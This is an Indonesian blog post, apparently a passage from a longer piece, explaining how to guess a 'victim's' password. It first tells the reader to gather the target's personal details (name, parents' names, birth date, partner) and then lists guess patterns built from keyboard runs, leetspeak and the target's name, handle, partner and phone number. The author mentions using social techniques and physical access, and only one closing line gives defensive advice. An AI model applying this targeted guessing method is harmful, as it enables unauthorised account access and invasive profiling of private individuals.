Y = jumlah karakter password
Z = jumlah kombinasi karakter password
^ = tanda pangkat
Contoh :
Karakter kombinasi adalah “hanya” angka yaitu : (1,2,3,4,5,6,7,8,9,0). Jadi jumlah
karakter = 10
Misalnya password yg digunakan hanya 2 karakter (37) maka jumlah karakter password
= 2
Maka jumlah kombinasi password yg mungkin terjadi adalah 10^2 = 100
Bisa anda bayangkan jika password berupa kombinasi karakter alfanumerik dan karakter
khusus selain panjangnya password, akan banyak sekali kombinasinya. Namun disitulah
tatangannya. Sebelum melakukan Blind Guessing, pastikan anda telah mendapatkan
informasi tentang korban, misalnya nama, nama org tua, tanggal lahir, nama kekasih dan
lainnya. Dapatkan sebanyak mungkin, hal ini akan sangat membantu.
1. Kombinasi Umum
Beberapa user yg malas suka menggunakan kombinasi yg mudah diingat dan sederhana,
contoh :
1234567890
0987654321
zxcvbnm
mnbvcxz
asdfghjkl
lkjhgfdsa
qwertyuiop
poiuytrewq
Saya rasa tidak sulit utk menemukan cara mengetiknya.
2. Kombinasi ala Hacker
Hacker suka sekali menggunakan angka menggantikan huruf, contoh : h4ck3r, 70mi,
m0b1 dan lainnya. Kemungkinan kombinasi tergantung menurut nama dan beberapa
kriteria lain seperti nama kekasih, hobi, nama situs/layanan yg digunakan dan lainnya.
contoh :
Nama korban : Master Hacker
Kemungkinan : m4st3r_h4ck3r, m4st3r, h4ck3r
3. Berhubungan dgn nama
Nama : John Doe
Kemungkinan : doe, jdoe, johndoe, jd
4. Berhubungan dgn handle
Nama : John Doe
Handle : tikus
Kemungkinan : jdtikus, tikusdoe, tikusjohn, tikus, rat, doetikus
5. Berhubungan dgn nama kekasih/teman
Nama : John Doe
Kekasih/teman : Fitri
Kemungkinan : johnlovefitri, fitriloveyou, jdf, johnfitri
6. Berhubungan dgn nomor telepon
Nama : John Doe
No.Telepon : 12345
Kemungkinan : jd12345, john12345, doe54321
7. Berhubungan dgn layanan/service yg digunakan
Nama : John Doe
Service : email
Kemungkinan : johnemail, jdemail, doemail, mymail, myemail
Bisa kita lihat dari kombinasi diatas yg sebenarnya masih sangat banyak sekali
kemungkinan yg terjadi. Namun beberapa yg cukup akurat adalah kombinasi umum dan
kombinasi ala hacker. Sengaja saya sebut kombinasi umum karena dalam banyak review
dgn rekan2 dan beberapa kenalan ternyata kombinasi (zxcvbnm) sangat dikenal. Tidak
lah begitu sulit utk menghafalnya dan pada dasarnya memang tidak perlu dihafalkan
karena memiliki susunan yg unik. Sebagian besar cenderung menggunakan hal2 yg
sederhana.
Kombinasi ala hacker juga sering saya jumpai. Dengan teknik sosial dan akses fisik, saya
sering menemukan password dgn kombinasi seperti ini. Penggunaan kombinasi ini sangat
sederhana dan mudah diingat.
Kombinasi ini sangat berhubungan dgn nama atau handle. Kembali kepada anda, sejauh
mana kreatifitas anda, sebanyak apa informasi yg berhasil anda dapatkan akan sangat
membantu akurasi penebakan password. Sebagai pengguna layanan dgn otentikasi yg
membutuhkan password. Kita tidak pernah lepas dari masalah memilih password yg baik.
Password yg baik hendaknya sulit ditebak, tidak berhubungan dgn diri kita atau org
terdekat.
Langganan:
Entri (Atom)
Ada kesalahan di dalam gadget ini
oupsss....
janGaN buGil DePan KaMeRa
